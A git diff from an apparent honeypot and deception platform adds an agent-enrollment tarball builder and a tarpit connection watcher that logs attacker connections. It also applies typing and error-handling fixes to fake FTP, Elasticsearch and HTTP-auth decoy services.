        tar: Open, writable archive to append to.
        name: Member path inside the archive.
        data: Raw content of the member.
        mode: Permission bits recorded for the member.
    """
    payload = io.BytesIO(data)
    member = tarfile.TarInfo(name)
    member.mode = mode
    member.size = len(data)
    # Stamp the member with the current UTC time, truncated to whole seconds.
    member.mtime = int(datetime.now(timezone.utc).timestamp())
    tar.addfile(member, payload)
|
||||||
|
|
||||||
|
|
||||||
|
def _render_systemd_unit(name: str, agent_name: str, master_host: str) -> bytes:
    """Fill in the ``<name>.service.j2`` template and return it as bytes.

    The template is read from the templates directory and treated as plain
    text: only the literal ``{{ agent_name }}`` and ``{{ master_host }}``
    placeholders are substituted, in that order.
    """
    text = (_templates_dir() / f"{name}.service.j2").read_text()
    for placeholder, value in (
        ("{{ agent_name }}", agent_name),
        ("{{ master_host }}", master_host),
    ):
        text = text.replace(placeholder, value)
    return text.encode()
|
||||||
|
|
||||||
|
|
||||||
|
def render_bootstrap(
    agent_name: str,
    master_host: str,
    tarball_url: str,
    expires_at: datetime,
    with_updater: bool,
) -> bytes:
    """Fill in the ``enroll_bootstrap.sh.j2`` template and return it as bytes.

    Substitution is plain literal replacement of ``{{ ... }}`` placeholders.
    ``generated_at`` is the current UTC time and ``expires_at`` is the given
    datetime, both rendered as ISO-8601 with microseconds dropped;
    ``with_updater`` is rendered as ``true`` or ``false``.
    """
    script = (_templates_dir() / "enroll_bootstrap.sh.j2").read_text()
    generated_at = datetime.now(timezone.utc).replace(microsecond=0).isoformat()

    # Applied strictly in this order, one placeholder at a time.
    substitutions = (
        ("{{ agent_name }}", agent_name),
        ("{{ master_host }}", master_host),
        ("{{ tarball_url }}", tarball_url),
        ("{{ generated_at }}", generated_at),
        ("{{ expires_at }}", expires_at.replace(microsecond=0).isoformat()),
        ("{{ with_updater }}", "true" if with_updater else "false"),
    )
    for placeholder, value in substitutions:
        script = script.replace(placeholder, value)
    return script.encode()
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Public API
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
def build_tarball(
    master_host: str,
    agent_name: str,
    host_uuid: str,
    issued: pki.IssuedCert,
    services_ini: Optional[str],
    updater_issued: Optional[pki.IssuedCert] = None,
    use_ipvlan: bool = False,
) -> bytes:
    """Build the gzipped enrollment tarball for one agent and return its bytes.

    Archive contents, in order: the included source files, the rendered
    ``etc/decnet/decnet.ini``, one systemd unit per entry in
    ``_SYSTEMD_UNITS``, the agent's CA cert / cert / key, the updater's
    CA cert / cert / key when *updater_issued* is given, and ``services.ini``
    when *services_ini* is non-empty. Private keys are stored with mode 0o600.
    """
    archive = io.BytesIO()
    with tarfile.open(fileobj=archive, mode="w:gz") as tar:
        for src, arcname in _iter_included(_repo_root()):
            tar.add(src, arcname=arcname, recursive=False)

        ini_bytes = _render_decnet_ini(master_host, host_uuid, use_ipvlan)
        _add_bytes(tar, "etc/decnet/decnet.ini", ini_bytes)

        for unit in _SYSTEMD_UNITS:
            unit_bytes = _render_systemd_unit(unit, agent_name, master_host)
            _add_bytes(tar, f"etc/systemd/system/{unit}.service", unit_bytes)

        # (arcname, PEM bytes, mode) — keys are owner-only, certs world-readable.
        cert_entries = [
            ("home/.decnet/agent/ca.crt", issued.ca_cert_pem, 0o644),
            ("home/.decnet/agent/worker.crt", issued.cert_pem, 0o644),
            ("home/.decnet/agent/worker.key", issued.key_pem, 0o600),
        ]
        if updater_issued is not None:
            cert_entries += [
                ("home/.decnet/updater/ca.crt", updater_issued.ca_cert_pem, 0o644),
                ("home/.decnet/updater/updater.crt", updater_issued.cert_pem, 0o644),
                ("home/.decnet/updater/updater.key", updater_issued.key_pem, 0o600),
            ]
        for arcname, pem, file_mode in cert_entries:
            _add_bytes(tar, arcname, pem, mode=file_mode)

        if services_ini:
            _add_bytes(tar, "services.ini", services_ini.encode())

    return archive.getvalue()
|
||||||
3
decnet/tarpit/__init__.py
Normal file
3
decnet/tarpit/__init__.py
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
from .worker import tarpit_watcher_worker
|
||||||
|
|
||||||
|
__all__ = ["tarpit_watcher_worker"]
|
||||||
208
decnet/tarpit/worker.py
Normal file
208
decnet/tarpit/worker.py
Normal file
@@ -0,0 +1,208 @@
|
|||||||
|
"""Tarpit connection watcher — edge-triggered enter/exit log events.
|
||||||
|
|
||||||
|
Polls active tarpit rules every ``DECNET_TARPIT_POLL_INTERVAL`` seconds
|
||||||
|
(default 15). For each rule, reads ``/proc/{pid}/net/tcp`` on the host
|
||||||
|
(no docker exec, no ss needed inside the container) to find ESTABLISHED
|
||||||
|
connections on the tarpitted ports. Emits structured log events:
|
||||||
|
|
||||||
|
* ``tarpit_enter`` — new connection seen on a tarpitted port
|
||||||
|
* ``tarpit_exit`` — connection gone; includes elapsed time in seconds
|
||||||
|
|
||||||
|
Runs embedded in the API process (always-on, near-zero cost when no
|
||||||
|
rules exist).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import asyncio
|
||||||
|
import json
|
||||||
|
import socket
|
||||||
|
from datetime import datetime, timezone
|
||||||
|
from typing import Any, Optional
|
||||||
|
|
||||||
|
from decnet.decky_io.resolve import resolve_decky_container
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.network import get_container_pid
|
||||||
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
|
log = get_logger("tarpit.watcher")
|
||||||
|
|
||||||
|
_POLL_INTERVAL_ENV = "DECNET_TARPIT_POLL_INTERVAL"
|
||||||
|
_DEFAULT_POLL_S = 15
|
||||||
|
|
||||||
|
_TCP_ESTABLISHED = "01"
|
||||||
|
|
||||||
|
|
||||||
|
def _read_proc_net_tcp(pid: int) -> str:
    """Return the text of ``/proc/{pid}/net/tcp``, or ``""`` if it cannot be read."""
    proc_file = f"/proc/{pid}/net/tcp"
    try:
        with open(proc_file) as handle:
            content = handle.read()
    except OSError:
        # Missing or unreadable file is reported as an empty table.
        content = ""
    return content
|
||||||
|
|
||||||
|
|
||||||
|
def _parse_connections(content: str, target_port: int) -> list[str]:
    """Return remote IPv4 addresses with an ESTABLISHED connection to *target_port*.

    *content* is the text of a ``/proc/<pid>/net/tcp`` table: a header row,
    then one row per socket whose columns 1-3 are the local ``ADDR:PORT``,
    the remote ``ADDR:PORT`` (hexadecimal) and the state code.

    Rows that are too short, or whose address fields cannot be parsed, are
    skipped instead of raising, so one malformed row cannot abort the scan.
    Rows whose remote address is ``0.0.0.0`` are ignored. One entry is
    returned per matching row, so an IP can appear more than once.
    """
    remote_ips: list[str] = []
    # [1:] drops the column-header row.
    for row in content.strip().splitlines()[1:]:
        cols = row.split()
        if len(cols) < 4:
            continue
        local_hex, rem_hex, state = cols[1], cols[2], cols[3]
        if state != _TCP_ESTABLISHED:
            continue
        try:
            local_port = int(local_hex.split(":")[1], 16)
            if local_port != target_port:
                continue
            # The address is printed as one hex word; reversing the bytes
            # gives dotted-quad order. NOTE(review): presumably assumes a
            # little-endian host — confirm for other architectures.
            ip_bytes = bytes.fromhex(rem_hex.split(":")[0])[::-1]
            ip = socket.inet_ntoa(ip_bytes)
        except (IndexError, ValueError, OSError):
            # Missing ':' separator, non-hex digits, or a non-4-byte address.
            continue
        if ip != "0.0.0.0":  # nosec B104
            remote_ips.append(ip)
    return remote_ips
|
||||||
|
|
||||||
|
|
||||||
|
def _get_poll_interval() -> int:
    """Return the poll interval in seconds, read from the environment.

    Reads the variable named by ``_POLL_INTERVAL_ENV``. Falls back to
    ``_DEFAULT_POLL_S`` when the variable is unset, is not an integer, or is
    zero or negative.
    """
    import os

    try:
        interval = int(os.environ.get(_POLL_INTERVAL_ENV, _DEFAULT_POLL_S))
    except (TypeError, ValueError):
        return _DEFAULT_POLL_S
    # A non-positive interval would make the watcher loop spin with no delay
    # between ticks, so treat it as a misconfiguration.
    return interval if interval > 0 else _DEFAULT_POLL_S
|
||||||
|
|
||||||
|
|
||||||
|
async def _get_attacker_uuid(repo: BaseRepository, ip: str) -> Optional[str]:
    """Look up the UUID of the ``Attacker`` row whose ``ip`` equals *ip*.

    Best-effort: returns ``None`` when no row matches and also when anything
    in the lookup raises, including the deferred imports.
    """
    try:
        from decnet.web.db.models import Attacker
        from sqlalchemy import select

        async with repo._session() as session:  # type: ignore[attr-defined]
            query = select(Attacker).where(Attacker.ip == ip)  # type: ignore[arg-type]
            outcome = await session.execute(query)
            attacker = outcome.scalar_one_or_none()
            if not attacker:
                return None
            # Read the attribute while the session is still open.
            return attacker.uuid
    except Exception:
        return None
|
||||||
|
|
||||||
|
|
||||||
|
async def _emit_log(
    repo: BaseRepository,
    *,
    event_type: str,
    decky_name: str,
    src_ip: str,
    port: int,
    extra: dict[str, Any] | None = None,
) -> None:
    """Store one tarpit event through ``repo.add_log``.

    The record's ``fields`` entry is a JSON object holding ``port``, the
    attacker UUID looked up for *src_ip* (possibly ``None``), and any keys
    from *extra*. Failures while building or storing the record are logged
    as a warning and not re-raised.
    """
    payload: dict[str, Any] = {
        "port": port,
        "attacker_uuid": await _get_attacker_uuid(repo, src_ip),
        **(extra or {}),
    }
    try:
        record = {
            "decky": decky_name,
            "service": "tarpit",
            "event_type": event_type,
            "attacker_ip": src_ip,
            "raw_line": f"tarpit {event_type} src={src_ip} decky={decky_name} port={port}",
            # Serialised inside the try so an unserialisable extra is only logged.
            "fields": json.dumps(payload),
        }
        await repo.add_log(record)
    except Exception as exc:
        log.warning("tarpit log emit failed: %s", exc)
|
||||||
|
|
||||||
|
|
||||||
|
async def tarpit_watcher_worker(repo: BaseRepository) -> None:
    """Run the tarpit watcher loop forever.

    The poll interval is read once at start-up. Each iteration runs one
    ``_tick`` and then sleeps for the interval. Cancellation propagates;
    any other exception from a tick is logged as a warning and the loop
    carries on.
    """
    interval_s = _get_poll_interval()
    log.info("tarpit watcher started poll_interval=%ds", interval_s)

    # Maps (decky_name, src_ip, port) to the time the connection was first seen.
    tracked: dict[tuple[str, str, int], datetime] = {}

    while True:
        try:
            await _tick(repo, tracked)
        except asyncio.CancelledError:
            # Let task cancellation through untouched.
            raise
        except Exception as exc:
            log.warning("tarpit watcher tick error: %s", exc)
        await asyncio.sleep(interval_s)
|
||||||
|
|
||||||
|
|
||||||
|
async def _tick(
    repo: BaseRepository,
    seen: dict[tuple[str, str, int], datetime],
) -> None:
    """Run one poll: emit enter events for new connections, exit events for gone ones.

    *seen* maps ``(decky_name, src_ip, port)`` to the first-seen timestamp and
    is mutated in place. When no tarpit rules exist it is cleared and nothing
    is emitted. Rules whose container or PID cannot be resolved
    (``LookupError``) are skipped for this tick.
    """
    rules = await repo.list_tarpit_rules()
    if not rules:
        # Nothing is tarpitted any more: drop tracked state without exit events.
        seen.clear()
        return

    live: set[tuple[str, str, int]] = set()

    for rule in rules:
        db_key: str = rule["decky_name"]
        ports: list[int] = rule["ports"]

        # Plain deckies use the stored key as both display and container name.
        decky_name = container = db_key
        if db_key.startswith("t:"):
            # Topology deckies are stored as "t:{topology_id}:{decky_name}";
            # resolve the real container name before asking for its PID.
            _, topology_id, decky_name = db_key.split(":", 2)
            try:
                container = await resolve_decky_container(
                    repo, decky_name, topology_id=topology_id,
                )
            except LookupError as exc:
                log.debug("tarpit watcher: %s", exc)
                continue

        try:
            pid = await asyncio.to_thread(get_container_pid, container)
        except LookupError as exc:
            log.debug("tarpit watcher: %s", exc)
            continue

        tcp_content = await asyncio.to_thread(_read_proc_net_tcp, pid)

        for port in ports:
            for src_ip in _parse_connections(tcp_content, port):
                key = (decky_name, src_ip, port)
                live.add(key)
                if key in seen:
                    continue
                seen[key] = datetime.now(timezone.utc)
                log.info(
                    "tarpit enter decky=%s src=%s port=%d",
                    decky_name, src_ip, port,
                )
                await _emit_log(
                    repo,
                    event_type="tarpit_enter",
                    decky_name=decky_name,
                    src_ip=src_ip,
                    port=port,
                )

    # Everything tracked but not observed this tick has disconnected.
    departed = [key for key in seen if key not in live]
    for key in departed:
        started = seen.pop(key)
        elapsed = int((datetime.now(timezone.utc) - started).total_seconds())
        decky_name, src_ip, port = key
        log.info(
            "tarpit exit decky=%s src=%s port=%d elapsed=%ds",
            decky_name, src_ip, port, elapsed,
        )
        await _emit_log(
            repo,
            event_type="tarpit_exit",
            decky_name=decky_name,
            src_ip=src_ip,
            port=port,
            extra={"duration_s": elapsed},
        )
|
||||||
@@ -138,7 +138,7 @@ def traced(fn: F) -> F: ...
|
|||||||
def traced(name: str) -> Callable[[F], F]: ...
|
def traced(name: str) -> Callable[[F], F]: ...
|
||||||
|
|
||||||
|
|
||||||
def traced(fn: Any = None, *, name: str | None = None) -> Any:
|
def traced(fn: Any = None, *, name: str | None = None) -> Any: # type: ignore[misc]
|
||||||
"""Decorator that wraps a function in an OTEL span.
|
"""Decorator that wraps a function in an OTEL span.
|
||||||
|
|
||||||
Usage::
|
Usage::
|
||||||
@@ -168,9 +168,9 @@ def traced(fn: Any = None, *, name: str | None = None) -> Any:
|
|||||||
# Called as @traced (no arguments)
|
# Called as @traced (no arguments)
|
||||||
return _wrap(fn, None)
|
return _wrap(fn, None)
|
||||||
# Fallback: @traced() with no args
|
# Fallback: @traced() with no args
|
||||||
def decorator(f: F) -> F:
|
def _fallback_decorator(f: F) -> F:
|
||||||
return _wrap(f, name)
|
return _wrap(f, name)
|
||||||
return decorator
|
return _fallback_decorator
|
||||||
|
|
||||||
|
|
||||||
def _wrap(fn: F, span_name: str | None) -> F:
|
def _wrap(fn: F, span_name: str | None) -> F:
|
||||||
|
|||||||
@@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]:
|
|||||||
if domain:
|
if domain:
|
||||||
principal = f"{domain}\\{username}"
|
principal = f"{domain}\\{username}"
|
||||||
else:
|
else:
|
||||||
principal = username or None
|
principal = username
|
||||||
|
|
||||||
return {
|
return {
|
||||||
"username": username,
|
"username": username,
|
||||||
|
|||||||
@@ -128,6 +128,9 @@ def main():
|
|||||||
signal.signal(signal.SIGINT, _forward)
|
signal.signal(signal.SIGINT, _forward)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
if proc.stdout is None:
|
||||||
|
proc.wait()
|
||||||
|
return
|
||||||
for raw_line in proc.stdout:
|
for raw_line in proc.stdout:
|
||||||
line = raw_line.rstrip()
|
line = raw_line.rstrip()
|
||||||
if not line:
|
if not line:
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
@@ -94,7 +94,7 @@ class ESHandler(BaseHTTPRequestHandler):
|
|||||||
server_version = "elasticsearch"
|
server_version = "elasticsearch"
|
||||||
sys_version = ""
|
sys_version = ""
|
||||||
|
|
||||||
def _send_json(self, code: int, data: dict) -> None:
|
def _send_json(self, code: int, data: dict | list) -> None:
|
||||||
body = json.dumps(data).encode()
|
body = json.dumps(data).encode()
|
||||||
self.send_response(code)
|
self.send_response(code)
|
||||||
self.send_header("Content-Type", "application/json; charset=UTF-8")
|
self.send_header("Content-Type", "application/json; charset=UTF-8")
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
@@ -7,9 +7,12 @@ forwards events as JSON to LOG_TARGET if set.
|
|||||||
|
|
||||||
import os
|
import os
|
||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
|
from typing import cast
|
||||||
|
|
||||||
from twisted.internet import defer, reactor
|
from twisted.internet import defer, reactor
|
||||||
|
from twisted.internet.interfaces import IReactorTCP
|
||||||
from twisted.protocols.ftp import FTP, FTPFactory, FTPAnonymousShell
|
from twisted.protocols.ftp import FTP, FTPFactory, FTPAnonymousShell
|
||||||
|
from twisted.python.failure import Failure
|
||||||
from twisted.python.filepath import FilePath
|
from twisted.python.filepath import FilePath
|
||||||
from twisted.python import log as twisted_log
|
from twisted.python import log as twisted_log
|
||||||
|
|
||||||
@@ -95,7 +98,8 @@ _BAIT_PATH = _setup_bait_fs()
|
|||||||
|
|
||||||
class ServerFTP(FTP):
|
class ServerFTP(FTP):
|
||||||
def connectionMade(self):
|
def connectionMade(self):
|
||||||
peer = self.transport.getPeer()
|
assert self.transport is not None
|
||||||
|
peer = self.transport.getPeer() # type: ignore[misc]
|
||||||
_log("connection", src_ip=peer.host, src_port=peer.port)
|
_log("connection", src_ip=peer.host, src_port=peer.port)
|
||||||
super().connectionMade()
|
super().connectionMade()
|
||||||
|
|
||||||
@@ -120,15 +124,16 @@ class ServerFTP(FTP):
|
|||||||
return defer.succeed((530, "Login incorrect."))
|
return defer.succeed((530, "Login incorrect."))
|
||||||
self.state = self.AUTHED
|
self.state = self.AUTHED
|
||||||
self._user = getattr(self, "_server_user", "anonymous")
|
self._user = getattr(self, "_server_user", "anonymous")
|
||||||
self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH))
|
self.shell = FTPAnonymousShell(FilePath(_BAIT_PATH)) # type: ignore[assignment]
|
||||||
return defer.succeed((230, "Login successful."))
|
return defer.succeed((230, "Login successful."))
|
||||||
|
|
||||||
def ftp_RETR(self, path):
|
def ftp_RETR(self, path):
|
||||||
_log("download_attempt", path=path)
|
_log("download_attempt", path=path)
|
||||||
return super().ftp_RETR(path)
|
return super().ftp_RETR(path)
|
||||||
|
|
||||||
def connectionLost(self, reason):
|
def connectionLost(self, reason: Failure) -> None: # type: ignore[override]
|
||||||
peer = self.transport.getPeer()
|
assert self.transport is not None
|
||||||
|
peer = self.transport.getPeer() # type: ignore[misc]
|
||||||
_log("disconnect", src_ip=peer.host, src_port=peer.port)
|
_log("disconnect", src_ip=peer.host, src_port=peer.port)
|
||||||
super().connectionLost(reason)
|
super().connectionLost(reason)
|
||||||
|
|
||||||
@@ -140,5 +145,5 @@ class ServerFTPFactory(FTPFactory):
|
|||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
twisted_log.startLoggingWithObserver(lambda e: None, setStdout=False)
|
twisted_log.startLoggingWithObserver(lambda e: None, setStdout=False)
|
||||||
_log("startup", msg=f"FTP server starting as {NODE_NAME} on port {PORT}")
|
_log("startup", msg=f"FTP server starting as {NODE_NAME} on port {PORT}")
|
||||||
reactor.listenTCP(PORT, ServerFTPFactory())
|
cast(IReactorTCP, reactor).listenTCP(PORT, ServerFTPFactory()) # type: ignore[arg-type]
|
||||||
reactor.run()
|
reactor.run() # type: ignore[attr-defined]
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
@@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import base64
|
import base64
|
||||||
|
import binascii
|
||||||
import re
|
import re
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
@@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An
|
|||||||
if scheme == "basic":
|
if scheme == "basic":
|
||||||
try:
|
try:
|
||||||
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace")
|
||||||
except (ValueError, base64.binascii.Error):
|
except (ValueError, binascii.Error):
|
||||||
return None
|
return None
|
||||||
if ":" not in decoded:
|
if ":" not in decoded:
|
||||||
return None
|
return None
|
||||||
|
|||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user